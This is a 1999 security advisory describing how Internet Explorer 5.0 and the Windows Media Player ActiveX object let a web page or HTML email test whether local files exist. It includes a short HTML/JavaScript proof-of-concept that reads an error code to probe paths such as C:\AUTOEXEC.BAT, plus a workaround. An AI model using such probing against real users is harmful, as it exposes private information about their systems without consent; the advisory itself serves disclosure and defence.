Disclaimer:
The opinions expressed in this advisory and program are my own and
not of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski is not liable for any damages caused by direct or indirect
use of the information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.
Description:
Internet Explorer 5.0 under Windows 95 (guess other versions are affected)
and Windows Media Player ActiveX object
allow checking the existence of local files and directories.
This vulnerability may be exploited by HTML email or news group posting
Details:
The problem is an error code returned by Windows Media Player ActiveX
object when a file is attempted to be opened.
Windows Media Player ActiveX object returns "-2147220970" error in
the ErrorCode property when a file or directory does not exist but is tried
to be opened.
The code is:
----------------------------------------------------------------------------------------
<object id="wm" WIDTH=0 HEIGHT=0
classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95"
>
</object>
<SCRIPT>
// -2147220970
function checkfile()
{
b=document.all.wm;
b.FileName=document.forms[0].elements[0].value;
if (b.ErrorCode == -2147220970)
alert("File does not exist")
else
alert("File exists");
}
</SCRIPT>
<FORM>
<INPUT TYPE="TEXT" VALUE="C:\AUTOEXEC.BAT" SIZE=60>
<INPUT TYPE="SUBMIT" VALUE="Check file" onclick="checkfile()">
</FORM>
----------------------------------------------------------------------------------------
Workaround:
Disable Active Scripting or Disable Script ActiveX Controls marked
Safe for Scripting
Demonstration is available at http://www.guninski.com/mscheckf.html
Copyright 1999 Georgi Guninski